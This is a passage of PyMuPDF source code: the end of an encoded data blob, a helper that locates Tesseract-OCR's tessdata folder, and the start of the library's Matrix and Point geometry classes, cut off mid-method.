b'qPxnlQWHhkwV1lSbyFPHXAKFucbzMgjkKYKpaEosDRPkDlgjoz+8+hRDAvsvjIOROpGzxD'
b'1m2b9KhAmAOvR93YEAj3odEUG/OljQ9XBgnb2IWh7c73hCc6DGk3tUtHqFZnA5Rmn1lSjU'
b'6oMtoD5o8vymYONSy6ngX1cuAhzcNTD83sT6pI/rIkSqp5HLSFt4h5ZuQTZhszLy/CYXQ6'
b'N0m/iAFfisTpJ6ehvAf60R6OZ+WVuQPch5VLphyasbnkz8wfUgqiHrKbWSpY/vFS6ZfjsL'
b'k8mOXaFYnfeXz1q7lFxTC5+N9t/G7BgtBLtzOWgjQkNeQxLJdmgoQF0txgmIPYY7F5pWg7'
b'aUE2nEyLrPmhpwQpgV3/nWcOUT/U6ipyJrrNBfFEd7eAVmuEqMhqjXCe/EGtO03+kKM0Nb'
b'/3ygCGgDp9l5EcGVmXxK4MjSui46N0DM1f1ea/00lErSPqQVNZFVEzTeW5pjidClRQaTwy'
b'1os8/gfPlX0H/l/9XGlUETfWq4T1PT/Xzo+Hjtc6KI1xlfyhl0xRhqKLtZPkD2eCNMdn1D'
b'HA3cBTlRjd8REUMUUGNcWA0X2AbWVfe43woGKNuP5+O4unMT7yZbkBM6S7Gsu6mAo08moZ'
b'7rCBhWYCjdwaRpyaSqCRW8OQ+mqxOmAj15bj33y1WBOwkWvDifOnFGjk1jLc9f8Wmgg0cm'
b'sY/p1XCxUCjdyCIZ3qInG10Ru5IKN8Wiis+U5rTWWFpvJUU6H2emTcejx+1Qg8I24ERHmR'
b'j7E2xiTCU9IzpRoL74G0gronQJpVhPjnPRQs2zTBb7RwF1x6z0YeZwuE4T8T6n59Mq+wto'
b'K4W2PThSDRQB+8mlGLw2EbQzKQ5XxJ3bP8zbMe8tHUgVQjYNpY+BbkA5op+mBNdQxgLrr1'
b'6ZorjEtBWaWBKGVVwvVGqILH6Nz/ArTavZuA9NsbRSKbPjnxjdvwRKyOsCsZxt3IDK4dYc'
b'oQbkVWIJcJp2asYqtETdIcrfcNJ0l8NwdpbaI2A61N1DQdWRkgK9ZmQxBjo1nCVIu/KXjO'
b'SvSayRj3J7tTQuNOcx8ElYsy0W8spSD9rhamqcdgK4X5bnhLoUVcsVUU2WpHCYPKMZrTzw'
b'zt92GKJpByJqdAfnaYQ/L5J6PQQd9qCKGwgsJUChIUJsTdPfGBHTtPZRE6mpsALOg6IGZL'
b'YFVi0n1UKwB5asmgk08IjA4eM2BdbgvSb52x49UH5fL0btWucvxTt3fm3NwxMlVeKDoqXw'
b'plTrcZiU/b8bBq0Xhcre3IGTNCfz1my8hR27EzZoz8OXYALe0H19qOoYKNfDuOH15rO4oK'
b'NnJtOXGyqoCNXFtOGGJrO5AGcOTesWSQre1QGsCRe8uKM6sM2Mi14/iBtrbjqWAj15YjQ2'
b'1tR1TBRq7JsZ2tXezPeIsdoF6pdJUFaBS7VuVlcXWoyRxeOvIFHW9o3gZSXUNfoQfTCyaY'
b'eB3DoXkSA6cfKT9sOEv7GYyhGw3ou0AKMkbXUJiAzv0Dfbi5LATDfHt3tdiQOny02ODg8b'
b'JCbuHRTawTi46Pi881HBsNzhxL3DogNpJnf0X0yjxx4fFo1cIJN178gU5g8WjlI18oNA7d'
b'xRofZ19acLyOkbt8HZs/urQj5cd+ZIVZMiiurJuh2uyZ2bXs0THJmYOPvXfJgVCvjtSMRX'
b'eEmo46QjTXnlZ0PEvJL23ZXxjE7UVZNv06y1UTZ0C0RjeLOFr0RcQJa57ZMheO223ImjaG'
b'9Lm1WczSAWVkxbYCKQM/RydfMMs6aqPBAqlx5wzYqBZChYaGHIjmaYgoOj+A0ovOC2g6yn'
b'NUI4giJwQgnOj48KOVreWCtNewUhL6Cg1y9bVEqaFH9xIxyOsTopOA+u16BekteAXf2kKc'
b'3mD7rcRbPL2lCL7edoX4Z3/KdoZoQ9bPPKH7N/iOzh8gW6PzB5qO8h+hIRij+yjNLbNonL'
b'xVTrTnq90l+2Y53InIrw93NskoTycB0TfuBfRWjubJdzP0BkvnZ55wqbLCj1bY6+QkCnvj'
b'vrXOWBYAN0GnMqSrcvS7iZWzZk5svJbUMOTNaC2pWQDU+nlt6KCfk9Z3dDBqfQmHpiOrHs'
b'YGfRn/b4cLYnzbdq9rA+3DyX4Kuu+ejZaTuu+wnBIjQfXzeNAOiGBK5Btsnlna22RMHb/f'
b'8/+dXCmC6h/wS3hmLbfw3gfnaE9ODCmBW7Lv9enM0mHeS2Fp7cRB3oUVRc592hRcuk57qT'
b'3oPVUO0I485t1YUWRfxIUh9Cw56VkPSD/rKVP3HVVFBK+mQitQ29c1LVNm9lNf3OmgG2Zz'
b'y8ay/PO6qAhhSpVZQu6Yg5Z1iuZYGcWMpEoN7YcK6DpCRs7grUP13u30SIUm0D0Mdt8sd9'
b'+jx9nmib+bccL9tFPXqaetckOPmmBmwKs2aN2OGyHK3j9iUdrPNNfEoyKyB0WEebYDxgtE'
b'Dr5aH3K43j3PkhuPVtBdtBu8JKD6A5RjdK2WpqP+oAVj3z8MO7v41AQyrD4pMFosUrhsmU'
b'4N9nXoURs5TjgBZosbeDS2oMp2+m7NLEtGpjEspK/mgnU2MH6GTWUHqHF6aZFggFdq4NYZ'
b'lYl14Ed1F4B6QLO1iB7jlx4KhnYOik3tKg8G+zoH3bKwc6JqQw/nOsp/h2lzOgeJQd3c0W'
b'JS1wrgjeqcFzGjc5HrHTjnJD7EMgmgnGKZKkyOsdQOdIZ4COzxLHflQ3E7baNVs4qAGoVL'
b'0vrCtpoAbwSSa/NSh+jnkVaLMoLDnXqrBUvScPSzSPAw0bC+hK9wTyJZtr60D74yDUfRrB'
b'K538I64ikMo6TlltzZFUlef2Fo9kCXvXJvlQmTBVodcEDQBwyww1R+px4RMbHoUQRj2/Yh'
b'zkx0vduo25xaYNRvlha96jgri497ThaRvtKOgvDYoD0yaL+dmB4x6xLNxH5CVE1pIss00S'
b'kidI8OGPe6Dr7qdR0ed7EEo6xiH7rlzceSKlbd3pxvmJmvoCJpOihIGjVfwxlwtriGxU/M'
b'FC/LKzT4cLwh1INFaqCgl1lBlAhzDYSgHCzOGkUHV0StvlCj1vZP5jFRqtT8pCnKwsGmTi'
b'l6dzmsz91ooYU8PZKhhukJeaPpaCRDTvW7i3o7ZmmB6MCzAfe9tc+hijHKKcY+nK6WdKYW'
b'Hq3oWHRkPdI6MF7lKZNblh/zJDb6KAwdHyilxt6zz48WZmx4o/tLl8ktcxEmkqc82Ef0f4'
b'YhyZBqwDTuwnBZBPKWvfqKbD9UGq96WHRAGBQNEA+JpYXCgGiAW8OhEUUPhsZlNBQaRA+E'
b'BpBhcGYoGQSXjvRDoHEsA6CJTg9/hh0/MbwS6HLkfsDbBuPwHvU7NnefeWcyQuaCyPhYGc'
b'iNjojL2XBnK/sZ7TQRs4c3K/epFekZ6oq+bhz1K1p4QeTcDT6pVrIwWDwec0d19O4eyi+6'
b'E5KudKvUdNQqIeWw6zcXI6uxtV6/OQW/9ixjzh7zkCdcdBKTZGQk2l+4GIt+T35WNmlIhX'
b'UhJNudC80m9lPXPAduzE6w+4yeWVOYPLM2TU6y1IQWbnRSPVlpHPbwwAswpp7a89zs0lF+'
b'08vcyw394mHL1w4x2M9nzkV4HslzfEjPTzQSXHnKhNsK9bB+6eGJUXtwd6BxVOqpgf6XmS'
b'P3JjTvFDWGzMKTJvCFp5zs3E70oYXzCddJKZ2bcIHRYLYDzWqjd1RpR3ZJ1rqiB++odo68'
b'+bHHvZymbF5RQ8zcw5Ueb7Q4HYN1GMolWtKpSHu1yhBarTIAn6TQPTqHbaLxkjPXCYjGj1'
b'XUE4uO1+0zC8c9e+mCGNkP5haNR4bSgqO+nU1IrwMiGnsqgs+RMyccFd1BhlI0ZziuG2Tp'
b'ODfaI0RVFmH2Wx38recOCwdz2UmHQ7YcxS4PW6rVNEwjpbsTZHH0pqymo+5kmcSvhxYUht'
b'q9tURLkbgLLyPh0B4ZrHlKC90IqsRGHQg2ZUsE8zZcXtfRvU6LhLbNUAr04dw5yYdneyQj'
b'c5Q1VeB7UHJqNyNH2/JaOpjyklbbvhXJ0fvcGbGr17nz5BytCa5IjzTzBUPvmaYoRcvkHC'
b'0frhQdnUmegHF+7bqdvuf8vOZBZxP0V6qXc34Y5ZRab6C2IzJoxgYM+ilIe1kn5s1nbZUP'
b'hiyDFfjG6Mu3DdBXnMPqV4mMeNDPW6IqGiBe30eVNOjYQp7F+3D1OGTDPLLw1Wl7eDEXjy'
b'bnsFiWWyK+q6VKgUZWCZRVnX+CLnCOVsYaQ8sCGmTQBw6mqAjdrccG5nSoLimfkxw941AS'
b'u3Hp6zzzjPHFAZMFOVcPP1QGDQfcTcC3bjjAAOI5V0E3ZO35cO9ZvSs8U+hI/KlhxbV7Vl'
b'vwRtRT4VxF3ZJ1fRtChaKJ7sUpFR01CjrcdS9bngvNeGZNSK9TmDh2PSft3WbQd7BNPOOP'
b'jksHgcGkK4XTkLeUY8MQRXdpKFEtKUpY2aFTqpZ8KO1sXx1lhp3DhXOKDBfOGTBcOGfIk6'
b'6GDZpi97UPM+pZY4Fo6kUwOuJQkPa9oiF0t+iA0C8aIPQ7+cTQI/uXBUEuNT1jpBndwViP'
b'eNFFjJVm+tX+KLSrKxlRH3QvkzWGHlXTuQGv2ox1O66+jA99Qfdnfzqb+zdyCzzyMGLGd+'
b'VA2ieCavtpTnqk9ntkxE/U7KxfzWZnwhlNaIUxnr42yXiX3uSNgUYzU+P0GM+WFoLJPGgS'
b'IKmtTB60SqOvhLs2UybEHQ9Z8vPFnCYRdkaMVmOTVZtYb+r8SOUgASYWGMKBktoi6ogJS9'
b'Ye2tF302eCnsx7cpzrhens4gY3TDENGyXDeXhuP4NXB6i5+MwiIQczDdyaj7vw/YzcBaAW'
b'r50DPUufeSjM0x0Uz9RzD4a5uoNudUhOVD1fd66jGbvDbh0SLy1LT+eda+nnnJMwpZ8L4C'
b'f1zotb7TNHUdoY4t2aJ7NB7RjSU7o06MPkLjg/Tyeprr9E1Y3u5kKdje7m0nQ0dhgGmtFV'
b'I514xqiNenzcRLNkPDmoHDJqoHQoz7yFR7Wcoj+xkLNdyR01RORmuNzvnJPSeeARERajXV'
b'azUDSDmFrQz+Yciozv9506PEShedIxDBulQ+LBxKAv0YtmlERd/eBOlFDm6FrxCsqtNmAp'
b'QUerJJBUvwfNNhFdVYX+IrqqStNR2TIgxIPs//NMc9qnrbUca4uIIXdGs0FaXLktPRac1R'
b'7a9xsHVQZ67M29Ms3SUGbZjxNVEnw8GB2o8WrutbDShd01hkAzRn+/8ATZwmlgj45m22GC'
b'fUSf0Jkb5GiePf0uV7YCl991ok8Uz266sqZMOR+I/i5bImq/70bHhC4CqrWMGwjZHWv3o0'
b'uTnGWRB6mn/ZA1803ZqXnSW+zOFeRNdhGC3Efo18SR5cd+/bRBsHziwRC7R16aPrXEkTtA'
b'zdwSPMRPa1jagPLZWr4013NO5D7DRCoCwlTKwWEyRSCaNBjAGHZSceNnmmlCc7J7RYRVdA'
b'eMN1gcfLXB4vB4g4XgNrrIDrmnVzPQcvUEe7Yi7W/BMIS+lccB4coOAvoE9czQ8RyQ88vr'
b'KU3DJn41u2jYEcQa7MQAXoW1lNZhPRKUWCLeOKtG5NHNYKgP0c1gmo46FlSPy/g2D47Sl/'
b'F1HosrMDoZjSx67XZflZ7ROEQGWu8kaGm5Q2SwNH4O57ewNZw7RDSGIp9OHSYaYOUBCZkB'
b'8WauPONH0D8MqbSjmnSQOQ3kLc3IhOr1IuN1dLNO4bDvIboPmZCjdajaAkGDMkCsP2UWCt'
b'qTAW7pTiYpWnMyLiO9ySC3tCYjtNaZjEspSMMO+tLMkV5bMo6lSI0c8m5OY7JQK0PGtVeF'
b'HNEfN0bRnCa8RhnxXeR2tXlyMes5GaK9KLM/UuqylxqkuxqtXCYXubwMIYaFFUeEy8saDc'
b'hKS5VEz4HmyWWzDt1HkYIOt41VlpSzIZDd2yFCRH3b2CKQ3jMmxIJJ9HnAJBlzhQXRVmmA'
b'nQDpUkUjdxItS4DqpjAIKTeUQUptJmnI8C4xSH3tD8LR14lBd7i4C8qaif30V860M0uraC'
b'muvqCsbSwdhbi0mFxQtgIdX1DGHNeQzhDk3ZUdMmTUtxSVye3lYXjVt1Ogz7+EO8yQqZKZ'
b'6Ogu148YrzyoluQq43J08xOkj1RGlAVX4PytQcVK0eYS7QlTIJD2m2u3uqvJFe4vJ6Jb9x'
b'TxnJ/s7cyy9QQlJxdaMRt8u2eRvsgLPCTQiqMtbzQonsg2158tCk/ox4ebMeh1SBO44fgL'
b'HzAPc4jcn4bK8DI2xPeYO0kBEaL8ZQKsdT0v37+Mn8qGwnc1/E2L5Gr0m4+xaPBD3UAPtz'
b'ZW8GrldBXgq1czG5S7f5KY/qP7rCoPSCeA6HVvh6yRboXfusVaOjRZ0le1LgN4y+45wr3F'
b'cwRqW2cwbgWSJtdhaEwHkSZf2cWXyVfZSyvwrbfSLB0MlEjrW4or0NwsWJIRtgdyRZbFCA'
b'hLkgYMS5KWNKe4oAE3QgWt2GDaz2pC5G0IL7uhZ/sahhkEqXo9qEHRS88YW78q3XI+JTlS'
b'LRtiV5rlguhYsVwC1JkzA23ejeDuiu8TzAg6qRYCcBKrngabLCOOPo8yizjhjaI4LAfWAK'
b'Pbb9vkq5/LIE16WWMFt2iC+uEkNHcL+TrkaV1/iJ3WR31XPObpDvNNRADdTgBGHS+qoJ6r'
b'VxDImJjefGe8HTN1UjxTG602yf9isEoPOoB58lU6XVQlP/hVSGxQ+ZHjeiyeoeLogW01TV'
b'5ZyFXy6rsVJPl1re4snYHUhzdWoPXhDU1H8i7IkGBqUOM+tG49qAMkeFZ2uAWF+2ou1uME'
b'ncF+fbs9hCE169ewU8g4R89ImtBfw0uUYTV9GjNib3WZvKpnhpbJa2i5pSXETB3d8Ksaz2'
b'uSaosN85BX1dKhO73q3axZChq+OSbwFuo0RSqixkoHIV+Rnk7dmwrJvKZUwyFNFvTFkAaQ'
b'Rwox0CrAzWWAL2cOh07VHeOFmEn7HZ4qB2i/1278Cstk9T2mDmFqHaHb2huT/GJRRYi7NJ'
b'zn4LjlZSqRclw7x8PrwV+kY5yEk3g8kn7lRrOXls2kfS+IRX7tRrNTz+b94ryja7SmVX6H'
b'L4tRLs2G/m46Zjccab4LxPjzb+PxRl2H9jTYCAZcFhVnLgmnMw0Yy4mTWG0/lr48/7fFu/'
b'r7TiStLhnQF7+X0GLsQjNRFHpBfDYBrVuNoaWZQOaoW0ce6SXXWQZa+9Z0pNQhQwbzMMmM'
b'H5HdC1noSf1GUIY4pL9GeEbfTLmF/KrPysFV6L1RB98OZqK0Sjj3xHDzpxqB82Xypza3zp'
b'JgT4lZ1p+6F4LTqBdqkj+jEx3QCf7kBUpNm0SWjui4xawRmfynkrXNEz4EBD30bb3ehA57'
b'2ib6tnRouG8yM18mcnF6Rlz1ZFkSXaNuvOmlLNJ68JiC1uOGpqOByDAkmhTUfs3h1e+6Ut'
b'yroSn3oI7iCozqwgJcrdqXcB7Ko7ZEGCaq5E3P9JG8qIAsLdPgInlTCuB0TtLcCB+GsGUW'
b'wFg3ZF6Od4pXxvWtkbCMGaORcB5zxzvNqFgRf7TlDIXk7Xp7GlPwt6vdaegmb7eNKzD+vn'
b'3HuALV9e2WccXMBGa3LIezXTcJGYc6oSoi029MU5nncZsmokZbQ16dDq8ZwHG9RRN4Q9sM'
b'JhbzCI8fxjI8fXHZlBl5vLmCgwYHKDYETAUbH7VnVXasGGcFOPdhijKDDF55YIm4bYpmaj'
b'/9agumUm+91oGRC1rwgvxgdIhY+sMb+mmMFWzD8eYYhYi6G6RtMA9mm48wT1NkmJYZMEzL'
b'DBlNsTKH6PsyVk0KMaID4ag0QxC5Zji62deKjnqWkgypDSiwqzuvoe29XV163V6BUT+C/s'
b'g8VmLPJ6AgBt1PGmFVh2ZieJNttIxJfgtv72KWJkvgLMmX4alDIe9ZAryXaR5D+oJRlCtt'
b'4uZIpR+skDN6sIIoftrBShkGLiQhOvGNIC4qg9EJRAfAS0VHGVyQIVVpAup03z/pPrZxWD'
b'+c+8c+ejQDQxp4u/4MPUTDVYBv+ZqRPS7GwoNa7CswKkbGrroVdowX3XuwJ9Xj5HJF2i8Y'
b'r5JvHFvnyTd9WA36xjdZRCbPO2/wrS8cIK2MOmuSI6NOBnVt1FkZNBh1Gldjo04G16szXJ'
b'mhR0e4JgC1jSdD+qN7xIRbHVhFCRs0visQvfW39fEPtSnPGN/M2adlaT9D1xABoXNwcOge'
b'AGhtCSn1S+VVi28ZqWeWcCM1an0KwBp+8tO+sV4tzJcYVjraj9ezPPkWLeAgtpuWk2hS37'
b'pbJ6NRAaITtgg/OmFL+mh2rybmK2z/WFrtX5UG8FtSltJ7Sh4Jm0oWiXeVbLB6s8gi0W6R'
b'hfSukEXUzo8F9HkXi/jtHUuZZvT7wLfOqAusAngYDg7PJpNFwK0MwFD3ndEakhGdR0ShbD'
b'vdnOYEzKK/vko+I6oLj+HcLr3KcG4U3zL5Fh0rQwWOjpWRPgzqPnBUQW0lwoYRDYwQNToR'
b'A/fRiRjQ0s/D79gsABOib2GDDQmK7OEReGQPP0/+7a59v0z+H+SUGTTsMAEA'
)).decode().splitlines()
def get_tessdata() -> str:
    """Detect Tesseract-OCR and return its language support folder.

    This function can be used to enable OCR via Tesseract even if the
    environment variable TESSDATA_PREFIX has not been set.
    If the value of TESSDATA_PREFIX is None, the function tries to locate
    Tesseract-OCR and fills the required variable.

    Returns:
        Folder name of tessdata if Tesseract-OCR is available, otherwise False.
    """
    TESSDATA_PREFIX = os.getenv("TESSDATA_PREFIX")
    if TESSDATA_PREFIX is not None:
        return TESSDATA_PREFIX

    # First check the well-known default installation location.
    if sys.platform == "win32":
        tessdata = "C:\\Program Files\\Tesseract-OCR\\tessdata"
    else:
        tessdata = "/usr/share/tesseract-ocr/4.00/tessdata"
    if os.path.exists(tessdata):
        return tessdata

    # Otherwise try to locate the tesseract-ocr installation.
    # Windows systems: ask the shell for tesseract.exe.
    if sys.platform == "win32":
        try:
            response = os.popen("where tesseract").read().strip()
        except OSError:
            response = ""
        if not response:
            print("Tesseract-OCR is not installed")
            return False
        dirname = os.path.dirname(response)  # path of tesseract.exe
        tessdata = os.path.join(dirname, "tessdata")  # language support
        if os.path.exists(tessdata):  # all ok?
            return tessdata
        # should not happen!
        print("unexpected: Tesseract-OCR has no 'tessdata' folder", file=sys.stderr)
        return False

    # Unix-like systems: ask 'whereis' for the installation folder.
    try:
        response = os.popen("whereis tesseract-ocr").read().strip().split()
    except OSError:
        response = []
    if len(response) != 2:  # if not 2 tokens: no tesseract-ocr
        print("Tesseract-OCR is not installed")
        return False

    # determine tessdata via iteration over subfolders of the install dir.
    # BUGFIX: the original iterated '.iterdir()' on the token *list*
    # returned by split(), which raised AttributeError; walk the reported
    # installation directory (second whereis token) instead.
    root = response[1]
    try:
        for sub in os.scandir(root):
            if not sub.is_dir():
                continue
            for sub_sub in os.scandir(sub.path):
                if sub_sub.name.endswith("tessdata"):
                    return sub_sub.path  # found the language support folder
    except OSError:
        pass  # unreadable folder: fall through to failure message
    print(
        "unexpected: tesseract-ocr has no 'tessdata' folder",
        file=sys.stderr,
    )
    return False
%}
| 81,757 | Python | .py | 1,973 | 35.428789 | 139 | 0.692846 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,378 | helper-geo-py.i | pymupdf_PyMuPDF/src_classic/helper-geo-py.i | %pythoncode %{
# ------------------------------------------------------------------------
# Copyright 2020-2022, Harald Lieder, mailto:harald.lieder@outlook.com
# License: GNU AFFERO GPL 3.0, https://www.gnu.org/licenses/agpl-3.0.html
#
# Part of "PyMuPDF", a Python binding for "MuPDF" (http://mupdf.com), a
# lightweight PDF, XPS, and E-book viewer, renderer and toolkit which is
# maintained and developed by Artifex Software, Inc. https://artifex.com.
# ------------------------------------------------------------------------
# largest 32bit integers surviving C float conversion roundtrips
# used by MuPDF to define infinite rectangles
FZ_MIN_INF_RECT = -0x80000000  # == -2147483648
FZ_MAX_INF_RECT = 0x7fffff80  # == 2147483520
class Matrix(object):
    """Matrix() - all zeros
    Matrix(a, b, c, d, e, f)
    Matrix(zoom-x, zoom-y) - zoom
    Matrix(shear-x, shear-y, 1) - shear
    Matrix(degree) - rotate
    Matrix(Matrix) - new copy
    Matrix(sequence) - from 'sequence'"""
    def __init__(self, *args):
        if not args:
            self.a = self.b = self.c = self.d = self.e = self.f = 0.0
            return None
        if len(args) > 6:
            raise ValueError("Matrix: bad seq len")
        if len(args) == 6:  # 6 numbers
            self.a, self.b, self.c, self.d, self.e, self.f = map(float, args)
            return None
        if len(args) == 1:  # either an angle or a sequ
            if hasattr(args[0], "__float__"):
                # rotation angle in degrees; round sin/cos to 12 digits so
                # that multiples of 90 degrees yield exact 0 / 1 values
                theta = math.radians(args[0])
                c = round(math.cos(theta), 12)
                s = round(math.sin(theta), 12)
                self.a = self.d = c
                self.b = s
                self.c = -s
                self.e = self.f = 0.0
                return None
            else:
                self.a, self.b, self.c, self.d, self.e, self.f = map(float, args[0])
                return None
        if len(args) == 2 or len(args) == 3 and args[2] == 0:
            # zoom matrix: scale factors on the diagonal
            self.a, self.b, self.c, self.d, self.e, self.f = float(args[0]), \
                0.0, 0.0, float(args[1]), 0.0, 0.0
            return None
        if len(args) == 3 and args[2] == 1:
            # shear matrix: shear factors off the diagonal
            self.a, self.b, self.c, self.d, self.e, self.f = 1.0, \
                float(args[1]), float(args[0]), 1.0, 0.0, 0.0
            return None
        raise ValueError("Matrix: bad args")

    def invert(self, src=None):
        """Calculate the inverted matrix. Return 0 if successful and replace
        current one. Else return 1 and do nothing.
        """
        if src is None:
            dst = util_invert_matrix(self)
        else:
            dst = util_invert_matrix(src)
        if dst[0] == 1:  # status 1 means: not invertible
            return 1
        self.a, self.b, self.c, self.d, self.e, self.f = dst[1]
        return 0

    def pretranslate(self, tx, ty):
        """Calculate pre translation and replace current matrix."""
        tx = float(tx)
        ty = float(ty)
        # only the translation components change
        self.e += tx * self.a + ty * self.c
        self.f += tx * self.b + ty * self.d
        return self

    def prescale(self, sx, sy):
        """Calculate pre scaling and replace current matrix."""
        sx = float(sx)
        sy = float(sy)
        self.a *= sx
        self.b *= sx
        self.c *= sy
        self.d *= sy
        return self

    def preshear(self, h, v):
        """Calculate pre shearing and replace current matrix."""
        h = float(h)
        v = float(v)
        a, b = self.a, self.b  # save originals: needed after overwriting
        self.a += v * self.c
        self.b += v * self.d
        self.c += h * a
        self.d += h * b
        return self

    def prerotate(self, theta):
        """Calculate pre rotation and replace current matrix."""
        theta = float(theta)
        # bring angle into range [0, 360)
        while theta < 0: theta += 360
        while theta >= 360: theta -= 360
        # exact handling for multiples of 90 degrees avoids rounding noise
        if abs(0 - theta) < EPSILON:
            pass
        elif abs(90.0 - theta) < EPSILON:
            a = self.a
            b = self.b
            self.a = self.c
            self.b = self.d
            self.c = -a
            self.d = -b
        elif abs(180.0 - theta) < EPSILON:
            self.a = -self.a
            self.b = -self.b
            self.c = -self.c
            self.d = -self.d
        elif abs(270.0 - theta) < EPSILON:
            a = self.a
            b = self.b
            self.a = -self.c
            self.b = -self.d
            self.c = a
            self.d = b
        else:
            # general case: multiply by a rotation matrix
            rad = math.radians(theta)
            s = math.sin(rad)
            c = math.cos(rad)
            a = self.a
            b = self.b
            self.a = c * a + s * self.c
            self.b = c * b + s * self.d
            self.c =-s * a + c * self.c
            self.d =-s * b + c * self.d
        return self

    def concat(self, one, two):
        """Multiply two matrices and replace current one."""
        if not len(one) == len(two) == 6:
            raise ValueError("Matrix: bad seq len")
        self.a, self.b, self.c, self.d, self.e, self.f = util_concat_matrix(one, two)
        return self

    def __getitem__(self, i):
        return (self.a, self.b, self.c, self.d, self.e, self.f)[i]

    def __setitem__(self, i, v):
        v = float(v)
        if i == 0: self.a = v
        elif i == 1: self.b = v
        elif i == 2: self.c = v
        elif i == 3: self.d = v
        elif i == 4: self.e = v
        elif i == 5: self.f = v
        else:
            raise IndexError("index out of range")
        return

    def __len__(self):
        return 6

    def __repr__(self):
        return "Matrix" + str(tuple(self))

    def __invert__(self):
        """Calculate inverted matrix."""
        m1 = Matrix()
        m1.invert(self)
        return m1
    __inv__ = __invert__  # alias: ~m

    def __mul__(self, m):
        # scalar multiplies componentwise, matrix-like multiplies matrices
        if hasattr(m, "__float__"):
            return Matrix(self.a * m, self.b * m, self.c * m,
                          self.d * m, self.e * m, self.f * m)
        m1 = Matrix(1,1)
        return m1.concat(self, m)

    def __truediv__(self, m):
        # scalar divides componentwise, matrix-like multiplies by inverse
        if hasattr(m, "__float__"):
            return Matrix(self.a * 1./m, self.b * 1./m, self.c * 1./m,
                          self.d * 1./m, self.e * 1./m, self.f * 1./m)
        m1 = util_invert_matrix(m)[1]
        if not m1:
            raise ZeroDivisionError("matrix not invertible")
        m2 = Matrix(1,1)
        return m2.concat(self, m1)
    __div__ = __truediv__  # Python 2 alias

    def __add__(self, m):
        if hasattr(m, "__float__"):
            return Matrix(self.a + m, self.b + m, self.c + m,
                          self.d + m, self.e + m, self.f + m)
        if len(m) != 6:
            raise ValueError("Matrix: bad seq len")
        return Matrix(self.a + m[0], self.b + m[1], self.c + m[2],
                          self.d + m[3], self.e + m[4], self.f + m[5])

    def __sub__(self, m):
        if hasattr(m, "__float__"):
            return Matrix(self.a - m, self.b - m, self.c - m,
                          self.d - m, self.e - m, self.f - m)
        if len(m) != 6:
            raise ValueError("Matrix: bad seq len")
        return Matrix(self.a - m[0], self.b - m[1], self.c - m[2],
                          self.d - m[3], self.e - m[4], self.f - m[5])

    def __pos__(self):
        return Matrix(self)

    def __neg__(self):
        return Matrix(-self.a, -self.b, -self.c, -self.d, -self.e, -self.f)

    def __bool__(self):
        # False only for the all-zero matrix
        return not (max(self) == min(self) == 0)

    def __nonzero__(self):
        return not (max(self) == min(self) == 0)

    # NOTE(review): __eq__ without __hash__ makes Matrix unhashable
    # (Python sets __hash__ = None) — confirm this is intended.
    def __eq__(self, mat):
        if not hasattr(mat, "__len__"):
            return False
        return len(mat) == 6 and bool(self - mat) is False

    def __abs__(self):
        # Euclidean (Frobenius) norm of the 6 components
        return math.sqrt(sum([c*c for c in self]))
    norm = __abs__

    @property
    def is_rectilinear(self):
        """True if rectangles are mapped to rectangles."""
        return (abs(self.b) < EPSILON and abs(self.c) < EPSILON) or \
            (abs(self.a) < EPSILON and abs(self.d) < EPSILON);
class IdentityMatrix(Matrix):
    """Identity matrix [1, 0, 0, 1, 0, 0]"""
    def __init__(self):
        Matrix.__init__(self, 1.0, 1.0)

    def __setattr__(self, name, value):
        # enforce immutability of the matrix components: diagonal entries
        # are pinned to 1, the rest to 0, regardless of assigned value
        if name in "ad":
            self.__dict__[name] = 1.0
        elif name in "bcef":
            self.__dict__[name] = 0.0
        else:
            self.__dict__[name] = value

    def checkargs(*args):
        # bound as replacement for every mutating Matrix method below
        raise NotImplementedError("Identity is readonly")

    prerotate = checkargs
    preshear = checkargs
    prescale = checkargs
    pretranslate = checkargs
    concat = checkargs
    invert = checkargs
    def __repr__(self):
        return "IdentityMatrix(1.0, 0.0, 0.0, 1.0, 0.0, 0.0)"

    def __hash__(self):
        return hash((1,0,0,1,0,0))

# module-level singleton for general use
Identity = IdentityMatrix()
class Point(object):
    """Point() - all zeros\nPoint(x, y)\nPoint(Point) - new copy\nPoint(sequence) - from 'sequence'"""
    def __init__(self, *args):
        if not args:
            self.x = 0.0
            self.y = 0.0
            return None
        if len(args) > 2:
            raise ValueError("Point: bad seq len")
        if len(args) == 2:
            self.x = float(args[0])
            self.y = float(args[1])
            return None
        if len(args) == 1:  # a point-like sequence
            l = args[0]
            if hasattr(l, "__getitem__") is False:
                raise ValueError("Point: bad args")
            if len(l) != 2:
                raise ValueError("Point: bad seq len")
            self.x = float(l[0])
            self.y = float(l[1])
            return None
        raise ValueError("Point: bad args")

    def transform(self, m):
        """Replace point by its transformation with matrix-like m."""
        if len(m) != 6:
            raise ValueError("Matrix: bad seq len")
        self.x, self.y = util_transform_point(self, m)
        return self

    @property
    def unit(self):
        """Unit vector of the point."""
        s = self.x * self.x + self.y * self.y
        if s < EPSILON:  # zero-length vector has no direction
            return Point(0,0)
        s = math.sqrt(s)
        return Point(self.x / s, self.y / s)

    @property
    def abs_unit(self):
        """Unit vector with positive coordinates."""
        s = self.x * self.x + self.y * self.y
        if s < EPSILON:
            return Point(0,0)
        s = math.sqrt(s)
        return Point(abs(self.x) / s, abs(self.y) / s)

    def distance_to(self, *args):
        """Return distance to rectangle or another point."""
        if not len(args) > 0:
            raise ValueError("at least one parameter must be given")
        x = args[0]
        if len(x) == 2:
            x = Point(x)
        elif len(x) == 4:
            x = Rect(x)
        else:
            raise ValueError("arg1 must be point-like or rect-like")
        if len(args) > 1:
            unit = args[1]
        else:
            unit = "px"
        # conversion factors (numerator, denominator): multiply the
        # point-distance by numerator / denominator to get target unit
        u = {"px": (1.,1.), "in": (1.,72.), "cm": (2.54, 72.),
             "mm": (25.4, 72.)}
        f = u[unit][0] / u[unit][1]
        if type(x) is Point:
            return abs(self - x) * f

        # from here on, x is a rectangle
        # as a safeguard, make a finite copy of it
        r = Rect(x.top_left, x.top_left)
        r = r | x.bottom_right
        if self in r:
            return 0.0
        # classify our position relative to the rect: nearest feature is
        # either a corner or a perpendicular to one of the four edges
        if self.x > r.x1:
            if self.y >= r.y1:
                return self.distance_to(r.bottom_right, unit)
            elif self.y <= r.y0:
                return self.distance_to(r.top_right, unit)
            else:
                return (self.x - r.x1) * f
        elif r.x0 <= self.x <= r.x1:
            if self.y >= r.y1:
